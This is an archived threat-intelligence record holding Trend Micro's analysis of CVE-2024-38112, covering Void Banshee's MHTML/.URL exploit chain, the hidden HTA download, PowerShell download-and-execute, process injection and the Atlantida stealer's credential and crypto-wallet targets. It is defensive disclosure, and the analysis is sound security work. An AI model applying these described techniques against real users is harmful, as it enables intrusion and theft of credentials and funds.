{
	"id": "2560770d-ce85-4a1e-a467-102496fe1846",
	"created_at": "2026-04-06T00:21:33.452709Z",
	"updated_at": "2026-04-10T03:24:33.88581Z",
	"deleted_at": null,
	"sha1_hash": "2c05ab898e557bfc8ccbd814babf8255ec0fffcc",
	"title": "CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3439081,
	"plain_text": "CVE-2024-38112: Void Banshee Targets Windows Users Through\r\nZombie Internet Explorer in Zero-Day Attacks\r\nBy By: Peter Girnus, Aliakbar Zahravi Jul 15, 2024 Read time: 12 min (3358 words)\r\nPublished: 2024-07-15 · Archived: 2026-04-02 10:37:54 UTC\r\nExploits \u0026 Vulnerabilities\r\nOur threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to\r\naccess and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and\r\nreported this zero-day vulnerability to Microsoft, and it has been patched.\r\nReport Highlights:\r\nIn May, ZDI threat hunters under Trend Micro’s Zero Day Initiative discovered a vulnerability that the APT\r\ngroup Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified\r\nand reported this as a zero-day vulnerability to Microsoft.\r\nThe vulnerability CVE-2024-38112 (ZDI-CAN-24433) was used as a zero-day to access and execute files\r\nthrough the disabled Internet Explorer using MSHTML.\r\nAs part of Void Banshee's attack chain, CVE-2024-38112 is being used to infect victim machines with the\r\nAtlantida info-stealer, which focuses on pilfering system information and sensitive data (like passwords\r\nand cookies) from various applications.\r\nVoid Banshee lures in victims using zip archives containing malicious files disguised as book PDFs; these\r\nare disseminated in cloud-sharing websites, Discord servers, and online libraries, among others. Void\r\nBanshee's attacks are concentrated in North America, Europe, and Southeast Asia.\r\nThis zero-day attack is a prime example of how unsupported Windows relics are an overlooked attack\r\nsurface that can still be exploited by threat actors to infect unsuspecting users with ransomwareopen on a\r\nnew tab, backdoors, or as a conduit for other kinds of malware.\r\nFor additional background on this entry, please read the ZDI blog entry, \"Uncoordinated Vulnerability\r\nDisclosure: The Continuing Issues with CVD\"open on a new tab.\r\nTrend Micro Zero Day Initiativeopen on a new tab (ZDI) discovered the MHTML remote code execution (RCE)\r\nvulnerability CVE-2024-38112open on a new tab. We immediately alerted Microsoft of this vulnerability being\r\nused in–the-wild as ZDI-CAN-24433. CVE-2024-38112 was used as part of an attack chain by the advanced\r\npersistent threat (APT) group Void Banshee, which targets North American, European, and Southeast Asian\r\nregions for information theft and financial gain. The final payload of this zero-day attack chain is the Atlantida\r\nstealer, which was first discovered in January 2024. Variations of the Atlantida campaign have been highly active\r\nthroughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains.\r\nIn mid-May 2024, we tracked this updated Void Banshee campaign using internal and external telemetry. The Void\r\nBanshee group used similar tools, tactics, and procedures (TTPs) that involved abusing internet shortcuts (.URL)\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 1 of 18\n\nand Microsoft protocol handlers and URI schemes, including the MHTML (MIME encapsulation of aggregate\r\nHTML documents) protocol which was able to access Windows system-disabled Internet Explorer.\r\nIn the attack chain shown in Figure 1, the threat actor leveraged CVE-2024-38112 to execute malicious code by\r\nabusing the MHTML protocol handler and x-usc directives through internet shortcut (URL) files. Using this\r\ntechnique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance\r\non Windows machines. This MHTML code execution vulnerability was used to infect users and organizations\r\nwith Atlantida malware.\r\nTrend provides protection to users from threat actors that exploit CVE-2024-38112 via the security solutions that\r\ncan be found at end of this blog entry.\r\nInternet Explorer used as an attack vector\r\nInternet Explorer (IE) has officially ended support on June 15, 2022open on a new tab. Additionally, IE has been\r\nofficially disabled through later versions of Windows 10, including all versions of Windows 11.  Disabled,\r\nhowever, does not mean IE was removed from the system. The remnants of IE exist on the modern Windows\r\nsystem, though it is not accessible to the average user (Figure 2).\r\nFigure 2. Internet Explorer still exists on modern Windows systems\r\nIf users attempt to execute the IE executable (iexplore.exe), instead its replacement, Microsoft Edge, opens. For\r\nusers and organizations that need to access sites and workloads through Internet Explorer, Microsoft has provided\r\nIE mode for Microsoft Edgeopen on a new tab (Figure 3). IE mode for Edge contains some IE-specific\r\nfunctionality, but operates inside the Microsoft Edge sandbox, which in theory provides enhanced security for the\r\nend user.\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 2 of 18\n\nFigure 3. Internet Explorer mode in Microsoft Edge\r\nIn this campaign, the ZDI threat hunting team discovered and analyzed samples exploiting CVE-2024-38112,\r\nwhich we disclosed to Microsoft. These samples could run and execute files and websites through the disabled IE\r\nprocess by exploiting CVE-2024-38112 through MSHTML. By using specially crafted.URL files that contained\r\nthe MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML\r\nApplication (HTA) files directly through the disabled IE process. This method of exploitation is similar to CVE-2021-40444open on a new tab, another MSHTML vulnerability that was used in zero-day attacks. This method of\r\nusing the disabled IE process as a proxy to access sites and scripts is especially alarming, as IE has historically\r\nbeen a vast attack surface but now receives no further updates or security fixes.\r\nThis vulnerability was patched as part of the July 2024 Patch Tuesdayopen on a new tab. As of this patch cycle,\r\nMicrosoft has unregistered the MHTML handler from Internet Explorer (Figure 4).\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 3 of 18\n\nFigure 4. MHTML handler is no longer registered with Internet Explorer\r\nThis means that MHTML is no longer usable inside of internet shortcut files.\r\nTechnical analysis\r\nT1566.002: Spearphishing Links\r\nVoid Banshee used zip archives containing copies of books in PDF format, along with malicious files disguised as\r\nPDFs in spearphishing links (T1566.002), on online libraries, cloud sharing sites, Discord, and a slew of\r\ncompromised websites.\r\nSome PDF lures we uncovered during our analysis of the Void Banshee campaign include textbooks and reference\r\nmaterial such as Clinical Anatomy, which suggests the campaign is targeting highly skilled professionals and\r\nstudents who often use reference materials and places where digital copies of books are collected (Figure 5). In the\r\ncase of exploiting CVE-2024-38112, Void Banshee changed the default icon of an internet shortcut file to that of a\r\nPDF file to entice the victim into executing it.\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 4 of 18\n\nFigure 5. Sample book lure\r\nStage 1: Malicious internet shortcut (URL) file\r\nName Books_A0UJKO.pdf.url\r\nSHA256 c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae\r\nSize 267 bytes\r\nFile type Internet shortcut\r\nThe zero-day attack begins when the victim opens a URL shortcut file designed to exploit CVE-2024-38112. One\r\nof the samples we uncovered, \"Books_A0UJKO.pdf.url\", is designed to look like a PDF copy of a book (Figure\r\n6). The URL shortcut uses the MHTML protocol handler and the x-usc! directive through the internet shortcut’s\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 5 of 18\n\nURL parameter. This logic string is similar to the exploit logic of CVE-2021-40444open on a new tab (Microsoft\r\nOffice Remote Code Execution Vulnerability), highlighting the continued misuse of Windows protocol handlers. \r\nFigure 6. Malicious URL file disguised to look like a PDF of a book\r\nIn this attack, CVE-2024-38112 was used as a zero-day to redirect a victim by opening and using the system-disabled IE to a compromised website which hosted a malicious HTML Application (HTA), as shown in Figure\r\n7.  \r\nFigure 7. Content of “Books_A0UJKO”\r\nIn the URL parameter of the internet shortcut file, we can see that Void Banshee specifically crafted this URL\r\nstring using the MHTML protocol handler along with the x-usc! directive. This logic string opens the URL target\r\nin the native Internet Explorer through the iexplore.exe process.\r\nStage 2: HTML file downloader\r\nName test1.html\r\nSHA256 d8824f643127c1d8f73028be01363fd77b2ecb050ebe8c17793633b9879d20eb\r\nSize 716 bytes\r\nFile type HTML\r\nAs mentioned above, the internet shortcut file that exploits CVE-2024-38112 points to an attacker-controlled\r\ndomain where an HTML file downloads the HTA stage of the infection chain (Figure 8). Using this HTML file,\r\nthe attacker can also control the window view size of the website through IE. This is used by the threat actor to\r\nhide browser information and to mask the downloading of the next stage of the infection chain from the victim.\r\nVoid Banshee specifically crafted this HTML file using window size elements to control the window size of IE.\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 6 of 18\n\nFigure 8. Contents of “test1.html”\r\nOnce this URL is contacted via IE, it attempts to open the malicious HTA file, prompting the user to open or save\r\nthe HTML application (Figure 9). This behavior is unique to IE in that HTA files are opened by default, whereas\r\nmodern browsers like Microsoft Edge or Chrome do not have the default open action.\r\nFigure 9. Internet Explorer downloads the “Books_A0UJKO.pdf\u003c26 spaces\u003e.hta” file\r\nThe attacker adds 26 spaces to the malicious HTA file extension in “Books_A0UJKO.pdf.hta” to push the\r\nextension off the screen (Figure 10). The ellipses highlight that the filename contains additional content however,\r\nit is not clickable or expandable. To an unsuspecting user, it appears as if this is merely a PDF file.\r\nFigure 10. The HTA file extension does not appear on the screen\r\nStage 3: HTA file and VBS downloader\r\nName Books_A0UJKO.pdf\u003c26 spaces\u003e.hta\r\nSHA256 87480b151e465b73151220533c965f3a77046138f079ca3ceb961a7d5fee9a33\r\nSize 1,662 bytes\r\nFile type Internet shortcut\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 7 of 18\n\nThe HTA file contains a Visual Basic Script (VBScript) that decrypts XOR encrypted content with key 4 and\r\nexecutes the content using PowerShell (Figure 11). This script uses PowerShell to download an additional script\r\nhosted on a compromised web server and executes the command using the PowerShell irm (Invoke-RestMethod)\r\nalias and iex (Invoke-Expression) alias commands. Finally, the script creates a new process for the downloaded\r\nscript using the Win32_Process WMI class.\r\nFigure 11. The VBScript in the HTA file\r\nStage 4: PowerShell trojan downloader\r\nName become.txt\r\nSHA256 c85eedd51dced48b3764c2d5bdb8febefe4210a2d9611e0fb14ffc937b80e302\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 8 of 18\n\nSize 551 bytes\r\nFile type PowerShell\r\nInitially, the script defines the DllImport attributes to import two functions:\r\nGetConsoleWindow from kernel32.dll, which retrieves the handle of the console window associated with\r\nthe calling process.\r\n“ShowWindow” from user32.dll, which sets the visibility state of the specified window.\r\nIt then uses the Add-Type cmdlet to add the type defined in $crop213 to the current PowerShell session, under the\r\nnamespace crumble542543 with the name culture6546.\r\nNext, the script retrieves the handle of the console window using the GetConsoleWindow method and stores it in\r\n$danger5646. It then calls ShowWindow with the window handle and the parameter 0, which hides the console\r\nwindow. This technique is often employed in malware to run without displaying any user interface.\r\nThe script proceeds to create a new System.Net.WebClient object, which is used to download data from a\r\nmalicious server. This downloaded data is subsequently loaded as a .NET assembly using the\r\nSystem.Reflection.Assembly's Load method. Finally, the script invokes the entry point of the downloaded\r\nassembly, effectively executing the code contained within it.\r\nFigure 12. Contents of the “become.txt” PowerShell file\r\nStage 5: .NET trojan loader\r\nName LoadToBadXml.exe , tedfd.te, Vnn3qRKOxH.exe\r\nSHA256 13907caae48ea741942bce60fa32087328475bd14f5a81a6d04d82286bd28b4d\r\nSize 6,994,432 bytes\r\nFile type PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Window\r\nLoadToBadXml is a .NET Trojan loader that is obfuscated using Eziriz .NET Reactor. As shown in Figure 13, it\r\ndecrypts XOR-encrypted payloads using a byte array key (3, 2, 2).\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 9 of 18\n\nFigure 13. The payload decryption process\r\nIt then injects them into C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe. The malware employs\r\na common process injection technique, which involves the following steps:\r\nCreate Process: The malware uses the CreateProcess Windows API to launch RegAsm.exe in a suspended\r\nstate.\r\nMemory Allocation: It allocates space within the RegAsm.exe process using the VirtualAllocEx API.\r\nWrite Payload: The decrypted payload is then written into the allocated memory space using the\r\nWriteProcessMemory API.\r\nExecute Payload: Finally, the malware creates a remote thread within the RegAsm.exe process to execute\r\nthe injected payload using the CreateRemoteThread API.\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 10 of 18\n\nLoadToBadXml is a modified version of the shellcode injector from Program.csopen on a new tab of the open-source project Donut Loader (Figure 14).\r\nFigure 14. LoadToBadXml injects the decrypted Donut loader into the RegAsm.exe process\r\nStage 6: Donut loader\r\nSHA256 119b0994bcf9c9494ce44f896b7ff4a489b62f31706be2cb6e4a9338b63cdfdb\r\nSize 6.59 MB (6,918,144 bytes)\r\nFile type Shellcode\r\nDonutopen on a new tab is an opensource position-independent code that enables in-memory execution of\r\nVBScript, JScript, EXE, DLL files, and dotNET assemblies. In this attack, Donut is used to decrypt and execute\r\nthe Atlantida stealer inside RegAsm.exe process memory.\r\nStage 7: Atlantida stealer analysis\r\nName AtlantidaStealer.exe\r\nSHA256 6f1f3415c3e52dcdbb012f412aef7b9744786b2d4a1b850f1f4561048716c750\r\nSize 6.6 MB  (6,883,112 bytes)\r\nCompilation time 2024-01-25 15:52:03\r\nFile type PE32 executable (GUI) Intel 80386, for MS Windows\r\nThe final payload delivered in this attack is the Atlantida stealer, an info-stealer malware with extensive\r\ncapabilities. Overall, the malware is built from open-source stealers NecroStealeropen on a new tab and\r\nPredatorTheStealeropen on a new tab, incorporating many of the same functions and structures found in these\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 11 of 18\n\nprograms. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, various\r\ncryptocurrency wallets, and web browsers. This malware focuses on extracting stored sensitive and potentially\r\nvaluable data, such as passwords and cookies, and it can also collect files with specific extensions from the\r\ninfected system's desktop. Moreover, the malware captures the victim's screen and gathers comprehensive system\r\ninformation. The stolen data is then compressed into a ZIP file and transmitted to the attacker via TCP.Upon\r\nexecution, the malware initializes the ZIP file, sets up necessary structures, and manages the process of writing\r\nfiles to the archive. It then retrieves the \"APPDATA\" and \"DESKTOP\" paths and stores them in a global variable.\r\nThis variable is later used throughout the code to access these locations, utilizing the SHGetFolderPathA Windows\r\nAPI with CSIDL values \"0x1A\" and \"0x00,\" respectively.\r\nAfterward, it takes a screenshot, saves it as \"screenshot.jpeg,\" and adds it to the ZIP. The compression method is\r\nsimilar to the one used in zip.cpp for Necro Stealer and PredatorTheStealer.\r\nTo retrieve an infected system's geolocation information, such as IP address, country, and zip code, the malware\r\ncontacts its command-and-control (C\u0026C) server over port 6666 instead of using public services. Figure 15 shows\r\nan example of a C\u0026C response: \r\nFigure 15. C\u0026C response with the infected system’s geolocation information\r\nThe malware then stores this in the “Geo Information.txt” and appends it to the ZIP archive (Figure 16). \r\nNext, the malware starts to collect system information such as RAM, GPU, CPU, and screen resolution and stores\r\nit in “User Information.txt”, subsequently appending this file to a zip archive held in memory (Figure 17).\r\nFurthermore, the malware harvests credentials and sensitive files from various applications. For FileZilla, the\r\nmalware searches for the XML file located at C:\\Users\\\r\n\u003cUSERNAME\u003e\\AppData\\Roaming\\FileZilla\\recentservers.xml, which contains information about recently\r\nconnected servers. This XML file typically includes data such as the server's hostname, port number, username,\r\nand connection type. Additionally, the malware attempts to steal data that includes:\r\nAll files with the \".txt\" extension from the infected system’s desktop directory\r\nAll JSON files under C:\\Users\\Username\\AppData\\Roaming\\Binance\r\nTelegram data under C:\\Users\\Username\\AppData\\Roaming\\Telegram Desktop\r\nSteam configurations\r\nWeb browser Google Chrome\r\nMozilla Firefox and Microsoft Edge’s cookies and credentials\r\nThe Atlantida stealer has the ability to steal information from cryptocurrency-related Google Chrome and\r\nMicrosoft Edge extensions. For each extension, an “Extension ID” is given. The malware uses this information to\r\nharvest data stored within.\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 12 of 18\n\nThis is the extension path:\r\nC:\\Users\\\u003cYOUR_USERNAME\u003e\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension\r\nSettings\\\u003c Extension ID \u003e\r\nThe following is a browser extension list of cryptocurrency wallets:\r\nExtension Name Extension ID\r\nAuroWallet cnmamaachppnkjgnildpdmkaakejnhae\r\nBinanceWallet fhbohimaelbohpjbbldcngcnapndodjp\r\nBitClip ijmpgkjfkbfhoebgogflfebnmejmfbml\r\nBitoke oijajbhmelbcoclnkdmembiacmeghbae\r\nBitAppWallet fihkakfobkmkjojpchpfgcmhfjnmnfpi\r\nByone nlgbhdfgdhgbiamfdfmbikcdghidoadd\r\nCardWallet apnehcjmnengpnmccpaibjmhhoadaico\r\nCloverWallet nhnkbkgjikgcigadomkphalanndcapjk\r\nCoin89 aeachknmefphepccionboohckonoeemg\r\nCryptoAirdrops dhgnlgphgchebgoemcjekedjjbifijid\r\nCyanoWallet dkdedlpgdmmkkfjabffeganieamfklkm\r\nEQUALWallet blnieiiffboillknjnepogjhkgnoapac\r\nFlint hnhobjmcibchnmglfbldbfabcgaknlkj\r\nFreaksAxie copjnifcecdedocejpaapepagaodgpbh\r\nGuarda jbdaocneiiinmjbjlgalhcelgbejmnid\r\nGuildWallet nkddgncdjgjfcddamfgcmfnlhccnimig\r\nguildwallet nanjmdknhkinifnkgdcggcfnhdaammmj\r\nHyconLiteClient bcopgchhojmggmffilplmbdicgaihlkp\r\nICONex flpiciilemghbmfalicajoolhkkenfel\r\niWallet kncchdigobghenbbaddojjnnaogfppfj\r\nKeplr dmkamcknogkgcdfhhbddcghachkejeap\r\nKHC hcflpincpppdclinealmandijcmnkbgn\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 13 of 18\n\nLeaf Walle cihmoadaighcejopammfbmddcmdekcje\r\nLiqualityWallet kpfopkelmapcoipemfendmdcghnegimn\r\nMathWallet afbcbjpbpfadlkmhmclhkeeodmamcflc\r\nMetamask nkbihfbeogaeaoehlefnkodbefgpgknn\r\nMetaWallet bkklifkecemccedpkhcebagjpehhabfb\r\nMEW CX nlbmnnijcnlegkjjpcfjclmcfggfefdm\r\nNaboxWallet nknhiehlklippafakaeklbeglecifhad\r\nNami lpfcbjknijpeeillifnkikgncikgfhdo\r\nNashExtension onofpnbbkehpmmoabgpcpmigafmmnjhl\r\nNiftyWallet jbdaocneiiinmjbjlgalhcelgbejmnid\r\nOasis ppdadbejkmjnefldpcdjhnkpbjkikoip\r\nOneKey infeboajgfhgbjpjbeppbkgnabfdkdaf\r\nPhantom bfnaelmomeimhlpmgjnjophhpkkoljpa\r\nPolymesh Wallet jojhfeoedkpkglbfimdfabpdfjaoolaf\r\nRabby acmacodkjbdgmoleebolmdjonilkdbch\r\nSaturn Wallet cphhlgmgameodnhkjdmkpanlelnlohao\r\nsollet fhmfendgdocmcbmfikdcogofphimnkno\r\nTerraStation aiifbnbfobpmeekipheeijimdpnlpgpp\r\nTemple ookjlbkiijinhpmnjffcofjonbfbgaoc\r\nTezBox mnfifefkajgofkcjkemidiaecocnkjeh\r\nTronWallet pnndplcbkakcplkjnolgbkdgjikjednm\r\nWombat amkmjjmmflddogmhpjloimipbofnfjih\r\nXDefiWallet hmeobnfnfcmdkdcmlblgagmfpfboieaf\r\nYoroi ffnbelfdoeiohenkjibnmadjiehjhajb\r\nExtension name Microsoft Edge extension ID\r\nMetaMask ejbalbakoplchlghecdalmeeeajnimhm\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 14 of 18\n\nThe malware compresses all the collected data into a ZIP file and exfiltrates it to the attacker's C\u0026C server over\r\nTCP port 6655. \r\nFigure 18. Example of exfiltration of stolen data\r\nConclusion\r\nIn this campaign, we have observed that even though users may no longer be able to access IE, threat actors can\r\nstill exploit lingering Windows relics like IE on their machine to infect users and organizations with ransomware,\r\nbackdoors, or as a proxy to execute other strains of malware. The ability of APT groups like Void Banshee to\r\nexploit disabled services such as IE poses a significant threat to organizations worldwide. Since services such as\r\nIE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows\r\nusers. Furthermore, the ability of threat actors to access unsupported and disabled system services to circumvent\r\nmodern web sandboxes such as IE mode for Microsoft Edge highlights a significant industry concern.\r\nTo make software more secure and protect customers from zero-day attacks, Trend ZDIopen on a new tab works\r\nwith security researchers and vendors to patch and responsibly disclose software vulnerabilities before APT\r\ngroups can deploy them in attacks. The ZDI Threat Hunting team also proactively hunts for zero-day attacks in the\r\nwild to safeguard the industry.  The ZDI program is the largest vendor agnostic bug bounty program in the world\r\nwhile disclosing vulnerabilities to vendors at 2.5x the rateopen on a new tab.\r\nOrganizations can help protect themselves from these kinds of attacks with Trend Vision One™️open on a new\r\ntab, which enables security teams to continuously identify attack surfaces, including known, unknown, managed,\r\nand unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including\r\nvulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range\r\nof prevention, detection, and response capabilities. This is all backed by advanced threat research, intelligence,\r\nand AI, which helps reduce the time taken to detect, respond, and remediate issues. Ultimately, Vision One can\r\nhelp improve the overall security posture and effectiveness of an organization, including against zero-day attacks.\r\nWhen faced with uncertain intrusions, behaviors, and routines, organizations should assume that their system is\r\nalready compromised or breached and work to immediately isolate affected data or toolchains. With a broader\r\nperspective and rapid response, organizations can address breaches and protect its remaining systems, especially\r\nwith technologies such as  Trend Micro Endpoint Securityopen on a new tab and Trend Micro Network Security,\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 15 of 18\n\nas well as comprehensive security solutions such as Trend Micro™ XDRopen on a new tab, which can detect,\r\nscan, and block malicious content across the modern threat landscape.\r\nTrend protections\r\nThe following protections exist to detect and protect Trend customers against the zero-day CVE-2024-38112\r\n(ZDI-CAN-24433) and Atlantida malware exfiltration attempts.\r\nTrend Vision One Model\r\nMicrosoft Windows Remote Code Execution Vulnerability (ZDI-CAN-24433)\r\nSvchost Executes Iexplorer\r\nTrend Micro Cloud One - Network Security \u0026 TippingPoint Filters\r\n44417 - ZDI-CAN-24433: Zero Day Initiative Vulnerability (Microsoft Windows)\r\n44453 - Trojan.Win32.AtlantidaStealer.A Runtime Detection (Geo Information)\r\n44454 - Trojan.Win32.AtlantidaStealer.A Runtime Detection (Exfil Data)\r\nTrend Vision One Endpoint Security, Trend Cloud One - Workload and Endpoint Security, Deep Security\r\nand Vulnerability Protection IPS Rules\r\n1012075 - Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability Over SMB\r\n(CVE-2024-38112)\r\n1012074 - Microsoft Windows MSHTML Platform Remote Code Execution Vulnerability (CVE-2024-\r\n38112)\r\nMITRE ATT\u0026CK techniques\r\nTactic Technique Context\r\nInitial Access\r\nT1566.002 - Phishing: Spearphishing\r\nLink\r\nVictim downloads malicious zip archive\r\nExecution\r\nT1204.002 - User Execution: Malicious\r\nFile\r\nVictim executes Internet Shortcut (.URL)\r\nfile that exploits CVE-2024-38112\r\nDefense Evasion\r\nT1218 - System Binary Proxy\r\nExecution\r\nMHTML \u0026 x-usc directive handler open\r\ncompromised site in Internet Explorer\r\nCompromise\r\nInfrastructure\r\nT1584.004 - Compromise\r\nInfrastructure: Server\r\nVictim is redirected to compromised site\r\nwhich downloads a malicious HTML\r\nApplication (.HTA)\r\nExecution\r\nT1204.002 - User Execution: Malicious\r\nFile\r\nVictim opens HTA file\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 16 of 18\n\nExecution\r\nT1059.005 - Command and Scripting\r\nInterpreter - VBScript\r\nHTA application executes VBScript\r\nDefense Evasion\r\nT1027 - Obfuscated Files or\r\nInformation\r\nObfuscated VBScript\r\nCompromise\r\nInfrastructure  \r\nT1584.004 - Compromise\r\nInfrastructure: Server  \r\nVBScript downloads malicious PowerShell\r\nscript\r\nExecution\r\nT1059.001 - Command and Scripting\r\nInterpreter - PowerShell\r\nPowerShell script executes\r\nCompromise\r\nInfrastructure\r\nT1584.004 - Compromise\r\nInfrastructure: Server  \r\nPowerShell script downloads malicious\r\n.NET loader\r\nDefense Evasion\r\nT1027 - Obfuscated Files or\r\nInformation\r\nObfuscated .NET loader\r\nPrivilege\r\nEscalation\r\nT1055 – Process Injection\r\nAtlantida uses process injection to gain\r\npersistence\r\nExecution\r\nT1218.009 - System Binary Proxy\r\nExecution: Regsvcs/Regasm\r\nAtlantida abuses RegAsm.exe to proxy\r\nmalicious code execution\r\nCollection T1560.001 - Archive via Utility Atlantida encrypts data for exfiltration\r\nCollection T1005 – Data from Local System\r\nAtlantida collects sensitive local system\r\ninformation\r\nCollection T1082 – System Information Discovery\r\nAtlantida collects hardware information\r\nfrom victim\r\nCollection\r\nT1555.003 - Credentials from\r\nPassword Stores: Credentials from Web\r\nBrowsers\r\nAtlantida collects sensitive data from web\r\nbrowsers including Chrome extension data\r\nCollection T1113 – Screen Capture\r\nAtlantida captures screen captures of the\r\nvictim machine\r\nExfiltration\r\nT1041 - Exfiltration Over C\u0026C\r\nChannel  \r\nVoid Banshee exfiltrates stolen data to C\u0026C\r\nserver\r\nIndicators of Compromise (IOCs)\r\nDownload the full list of IOCs hereopen on a new tab.\r\nAcknowledgments\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 17 of 18\n\nThe Zero Day Initiative would like to thank the following Trenders for their contributions in ensuring that Trend\r\nMicro customers were protected from this zero-day attack pre-patching:\r\nScott Graham, Mohamad Mokbel, Abdelrahman Esmail, Simon Dulude, Senthil Nathan Sankar, Amit Kumar, and\r\na special thanks to the content writers and marketing teams for helping with this research.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nhttps://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html"
	],
	"report_names": [
		"CVE-2024-38112-void-banshee.html"
	],
	"threat_actors": [
		{
			"id": "d4f47608-d167-41e7-946a-316b757a68a4",
			"created_at": "2024-07-17T02:00:04.175014Z",
			"updated_at": "2026-04-10T02:00:03.672173Z",
			"deleted_at": null,
			"main_name": "Void Banshee",
			"aliases": [],
			"source_name": "MISPGALAXY:Void Banshee",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434893,
	"ts_updated_at": 1775791473,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2c05ab898e557bfc8ccbd814babf8255ec0fffcc.pdf",
		"text": "https://archive.orkl.eu/2c05ab898e557bfc8ccbd814babf8255ec0fffcc.txt",
		"img": "https://archive.orkl.eu/2c05ab898e557bfc8ccbd814babf8255ec0fffcc.jpg"
	}
}